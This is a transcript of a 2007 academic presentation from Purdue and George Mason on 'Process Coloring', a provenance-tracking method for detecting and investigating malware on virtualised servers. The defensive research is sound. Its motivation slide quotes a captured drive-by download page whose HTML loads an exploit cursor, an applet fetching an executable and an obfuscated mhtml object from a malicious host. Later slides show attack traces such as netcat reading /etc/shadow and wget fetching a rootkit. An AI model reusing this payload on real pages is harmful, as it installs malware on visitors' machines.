process coloring: an information flow-preserving approach to malware investigation
DESCRIPTION
NICIAR Site Visit, West Lafayette , IN, July 19, 2007. Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu (Presenter) Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS) - PowerPoint PPT PresentationTRANSCRIPT
Process Coloring: an Information Flow-Preserving Approach to Malware Investigation
Eugene Spafford, Dongyan Xu (Presenter)Department of Computer Science and
Center for Education and Research in Information Assurance and Security (CERIAS)
Purdue University
Xuxian JiangDepartment of Information and Software Engineering
George Mason University
NICIAR Site Visit, West Lafayette , IN, July 19, 2007
Motivation
Internet malware remains a top threat Malware: virus, worms, rootkits, spyware, bots…
Motivation
Upon Clicking a malicious URL http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/
z.html Result:
22 unwanted programs are installed without user’s consent!
MS04-013
MS03-011
MS05-002
<html><head><title></title></head><body>
<style>* {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")}</style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1><PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET><script>
try{document.write('<object data=`ms-its:mhtml:file://C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');}catch(e){} </script>
</body></html>
Motivation
Our Challenge: Enabling Timely, Efficient Malware Investigation
Raising timely alert to trigger a malware investigation Identifying the break-in point of the malware Reconstructing all contaminations by the malware
Time
External detection
point
Infection
Break-in point
trace-back
Contamination
reconstruction
Break-inpoint
LogLog
Detection
Today’s log-based intrusion investigation tools (e.g., BackTracker, Taser)
LogLog
Limitations of Today’s Tools
Long “infection-to-detection” interval Entire log needed for both trace-back and reconstruction Questionable trustworthiness of log data
Time
External detection
point
Infection
Break-in point
trace-back
Contamination
reconstruction
Break-inpoint
LogLog
Detection
Existing log-based intrusion investigation tools
LogLog
Goals of Research
Improve malware defense capabilities of enterprise computing infrastructure: Detection of malware activity Identification of vulnerable programs/applications Accountability of computation activities Recoverability from malware contaminations Proactive protection of sensitive information/data
Demonstrate via success metrics with respect to: Timeliness Efficiency Accuracy
Goals of Research
Goals fit within NICECAP research themes “Accountable information flows”
Based on information flow theory Instantiated at operating system level Holding malware accountable
“Large-scale system defense” Targeting large-scale malware infection (e.g.,
botnets) Enabling malware detection and remediation Providing first line of response (applicable to legacy
applications w/o source code)
Technical Approach: Process Coloring
Key idea: propagating malware break-in provenance information (“colors”) along OS-level information flows Existing tools only consider direct causality relations without
preserving and exploiting break-in provenance information
Runtime alert triggered by log color anomalies
ApacheSendmailDNSMySQL
Logger
Guest OS
Virtual Machine Monitor (VMM)
LogMonitor
Virtual Machine
Attacker
…
Log
New Capabilities of Process Coloring Color-based malware warning (vs. external detection point) Color-based break-in point identification (vs. back-tracking) Color-based log partitioning (vs. entire log) for reconstruction
TimeInfection
Break-inpoint
Detection
Contamination
reconstruction
Impact of Success
How will it benefit the NIC? Accountability of NIC cyber infrastructure Readiness against current and emerging
malware threats (e.g., botnets, rootkits, spyware) to NIC
Protection of NIC critical data, information, and computation activities
Reduction of NIC human labor in malware investigation
Impact of Success
How will it benefit the IA Community Systematic model for OS-level information
flows Mechanisms and policies for elevated
accountability of commodity OS Tools and methods for malware alert,
investigation, and recovery Artifacts, data, insights and lessons for
further malware research
Sample Scenario
httpd
/bin/sh
wgetRoot kitRoot kit
Local filesLocal files
AlertAlert
httpd netcat • /etc/shadow• Confidential
Info
• /etc/shadow• Confidential
Info
Question 2: How does the
malware break into the system?
Question 3: What does the
malware do after break-in?
Question 1: How is the malware
detected?
httpd
/bin/sh
wgetRoot kitRoot kit
Local filesLocal files
httpd netcat • /etc/shadow• Confidential
Info
• /etc/shadow• Confidential
Info
“httpd” READS an incoming request
“httpd” CREATES a new process “/bin/sh”
“/bin/sh” CREATES a new process “netcat”
“netcat” READS “/etc/shadow” file
“/bin/sh” MODIFIES local files
“/bin/sh” CREATES a new process “wget”
“wget” CREATES local file(s) - “Root kit”
Existing Approach
Log
1. Online log collection
AlertAlert
Externaldetection point
1. Online log collection
httpd
/bin/sh
wgetRoot kitRoot kit AlertAlert
Backward Tracking
Existing Approach
Log
2. Offline backward tracking
“wget” CREATES local file(s) - “Root kit”
“httpd” CREATES a new process “/bin/sh”
“/bin/sh” CREATES a new process “wget”
Break-in Point !
[King+, SOSP’03]
Externaldetection point
1. Online log collection
httpd
/bin/sh
wgetRoot kitRoot kit
Local filesLocal files
AlertAlert
netcat • /etc/shadow• Confidential
Info
• /etc/shadow• Confidential
Info
Existing Approach
Log
2. Offline backward tracking
3. Offline forward tracking
Forward Tracking“httpd” CREATES a new process “/bin/sh”
“/bin/sh” CREATES a new process “netcat”
“netcat” READS “/etc/shadow” file
“/bin/sh” CREATES a new process “wget”
“wget” CREATES local file(s) - “Root kit”
Break-in Point !
“/bin/sh” MODIFIES local files
Externaldetection point
httpd
Process Coloring Approach
s80httpdrcinit
s45named
s30sendmail
s55sshd
s80httpd
s30sendmail
s45named
s55sshd
/bin/sh
wgetRoot kitRoot kit
Local filesLocal files
netcat • /etc/shadow• Confidential
Info
• /etc/shadow• Confidential
Info
1. Initial coloring
2. Coloring diffusion
Log
Capability 3: Color-based log
partition for contamination analysis
Capability 2: Color-based
identification of break-in point
Capability 1: Color-based malware
warning
...BLUE: 673["sendmail"]: 5_open("/proc/loadavg", 0, 438) = 5BLUE: 673["sendmail"]: 192_mmap2(0, 4096, 3, 34, 4294967295, 0) =
1073868800BLUE: 673["sendmail"]: 3_read(5, "0.26 0.10 0.03 2...", 4096) = 25BLUE: 673["sendmail"]: 6_close(5) = 0BLUE: 673["sendmail"]: 91_munmap(1073868800, 4096) = 0...RED: 2568["httpd"]: 102_accept(16, sockaddr{2, cbbdff3a}, cbbdff38) = 5RED: 2568["httpd"]: 3_read(5, "\1281\1\0\2\0\24...", 11) = 11RED: 2568["httpd"]: 3_read(5, "\7\0À\5\0\128\3\...", 40) = 40RED: 2568["httpd"]: 4_write(5, "\132@\4\0\1\0\2\...", 1090) = 1090…RED: 2568["httpd"]: 4_write(5, "\128\19Ê\136\18\...", 21) = 21RED: 2568["httpd"]: 63_dup2(5, 2) = 2RED: 2568["httpd"]: 63_dup2(5, 1) = 1RED: 2568["httpd"]: 63_dup2(5, 0) = 0RED: 2568["httpd"]: 11_execve("/bin//sh", bffff4e8, 00000000)RED: 2568["sh"]: 5_open("/etc/ld.so.prelo...", 0, 8) = −2RED: 2568["sh"]: 5_open("/etc/ld.so.cache", 0, 0) = 6
Timeliness by Process Coloring: Color-Based Malware Warning
Capability 1: Color-based malware
warning: “unusual color inheritance”
Timeliness by Process Coloring Color-Based Malware Warning
Another example: “color mixing”RED: 1234 ["httpd"]: …RED: 1234 ["httpd"]: …RED: 1234 ["httpd"]: …RED+BLUE: 1234 ["httpd"]: system call to read file index.html
cp defaced.html index.html
bindhttpd
index.html
index.html
httpd
Efficiency by Process Coloring
Lion Slapper SARSTime period
being analyzed
24 hours 24 hours 24 hours
# worm-related entries
66,504 195,884 19,494
Exploited Service
BIND(CVE-2001-
0010)
Apache(CAN-2002-0656)
Samba(CAN-2003-
0085)
% of Log Inspected
48.7% 65.9% 12.1%
Capability 2: Color-based break-in point
identification
Capability 2: Color-based break-in point
identification
Capability 3: Color-based log partitioning
Capability 3: Color-based log partitioning
Accuracy by Process Coloring
Accuracy of color-based malware warning False positives and false negatives
Accuracy of malware contamination reconstruction Sufficiency of log partition (“no useful log entries
left out”) Compare malware action graphs with published
malware analysis report Limitation of causality-based reconstruction
algorithms (e.g., BackTracker, Taser)
Accuracy of Malware Contamination Reconstruction: the Slapper Worm Example
inet_sock(80)
2568: httpd
2568(execve): /bin//sh
2568(execve): /bin/bash -i
2586: /bin/rm –rf /tmp/.bugtraq.c2587: /bin/cat
/tmp/.uubugtraq /tmp/.bugtraq.c
fd 5
recv
execve
execve
fork, execvefork, execve
open, dup2, write unlink
accept
dup2, read
Research Task I: Color Diffusion Model (Month 1-6)
Color Diffusion Model
OS-level Information Flows
Operation Diffusion syscalls
CREATE create <s1, o1>create <s1, s2>
color(o1) = color(s1)color(s2) = color(s1)
create, mkdir, linkfork, vfork,
clone
READ read <s1, o1>read <s1, s2>
color(s1) = color(s1)υ color(o1)
color(s1) = color(s1)υ color(s2)
read, readv, recvptrace
WRITEwrite <s1, o1>write <s1, s2>
color(o1) = color(s1)υ color(o1)
color(s2) = color(s1)υ color(s2)
write, writev, sendPtrace, wait,
signal
DESTROY destroy <s1, o1>destroy <s1, s2>
unlink, rmdir, closeexit, kill
Research Task II: Process Coloring for Client and Server Side Malware Investigation (Month 2-18)
Server-side malware investigation Consolidated server environment with
independent server applications “Clustered” information flows partitioned by
server applications Color mixing highly unlikely between applications
Client-side malware investigation Inter-dependent client applications (e.g., text
editor compiler; latex dvips ps2pdf) More inter-application information flows Legal color mixing exists
A motivating example of client-side process coloring
Research Task II: Process Coloring for Client and Server Side Malware Investigation (Month 2-18)
FTP
Quick Tax
Time
Quick Tax
FTP
+
Research Task III: Color Mixing Handling via Information Flow Control (Month 7-18)
Profiling legal color mixing inside a client host Shared files Helper processes
Approach 1: information flow insulation
Approach 2: information flow border control
P1
Sharedfile
P2P2
Sharedfile
P1
SharedFile
P2
InsulatedInsulated
Related Work Based on Information Flows
Instruction level information flows Lacking system-wide semantic information
(e.g., info. about processes and files) Language level information flows
Focusing on information flows inside a program
Operating system level information flows Complementing the above categories Revealing system-wide semantic information Benefiting detection, recovery, and forensics
as first line of defense
Metrics: Definitions
Timeliness Malware infection-to-warning interval
Efficiency Percentage of log reduction for malware
contamination reconstruction Accuracy
False positive rate of malware warning False negative rate of malware warning Correctness of malware action graphs
Metrics: Evaluation Plan
Sources of malware Repository of malware (worms, botware, rootkits) Malware captured by honeypots and honeyfarm
Target computing environments Consolidated servers Clients
Experiment environments VM-based honeyfarm (Collapsar) VM-based malware playground (vGround)
Methodology: Evaluate by comparison With process coloring Without process coloring
Project Organization and Management
Purdue Team Faculty
Eugene Spafford Dongyan Xu
Graduate students Ryan Riley Larissa O’Brien TBD
Budget $xxx,xxx
George Mason Team Faculty
Xuxian Jiang Graduate
student TBD
Budget $xxx,xxx
Project Organization and Management
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
Experiments
June 7th, 2007
Software Deliverable
1. Task I (Section 3.1)
2. Task II (Section 3.2)
3. Task III (Section 3.3)
4. Meetings and Document Prep
5. Prototype Instantiation
Tasks
-
2.1 Subtask II.1
-
2.2 Subtask II.22.3 Subtask II.3
.
3.1 Subtask III.13.2 Subtask III.23.3 Subtask III.3
Quarterly Program Reviews Site Visit
Software Demonstrations
#1 #2 #3
Basic Xen-based prototype
Tools for malware investigation
Mechanisms forcolor mixing
control
Project Organization and Management
Spending during Summer’07:• Purdue: One month graduate student support (half-time)• GMU: One month summer salary (planned)
Spending during Summer’07:• Purdue: One month graduate student support (half-time)• GMU: One month summer salary (planned)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
Experiments
June 7th, 2007
Software Deliverable
1. Task I (Section 3.1)
2. Task II (Section 3.2)
3. Task III (Section 3.3)
4. Meetings and Document Prep
5. Prototype Instantiation
Tasks
-
2.1 Subtask II.1
-
2.2 Subtask II.22.3 Subtask II.3
.
3.1 Subtask III.13.2 Subtask III.23.3 Subtask III.3
Quarterly Program Reviews Site Visit
Software Demonstrations
#1 #2 #3
Recent Progress
We are here• Identifying color diffusion operations in Linux OS• Starting to implement log coloring and collection on Xen VMM
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
Experiments
June 7th, 2007
Software Deliverable
1. Task I (Section 3.1)
2. Task II (Section 3.2)
3. Task III (Section 3.3)
4. Meetings and Document Prep
5. Prototype Instantiation
Tasks
-
2.1 Subtask II.1
-
2.2 Subtask II.22.3 Subtask II.3
.
3.1 Subtask III.13.2 Subtask III.23.3 Subtask III.3
Quarterly Program Reviews Site Visit
Software Demonstrations
#1 #2 #3
Projected Progress in the Next 3-6 Months
• 11/21/07: A comprehensive color diffusion model under Linux
• 12/07/07: Demo and software release of basic Xen-based prototype
Technology Transfer Plan
Potential adopters Computer forensics/malware investigators and
researchers System administrators Anti-malware software companies Open source communities (e.g., XenSource)
Software release and documentation Presentations and demos to potential NIC
adopters Presentations and demos to anti-malware
software companies (Symantec, Microsoft, VMware)
Thank you!For more information about the Process Coloring project:
http://cairo.cs.purdue.edu/projects/[email protected]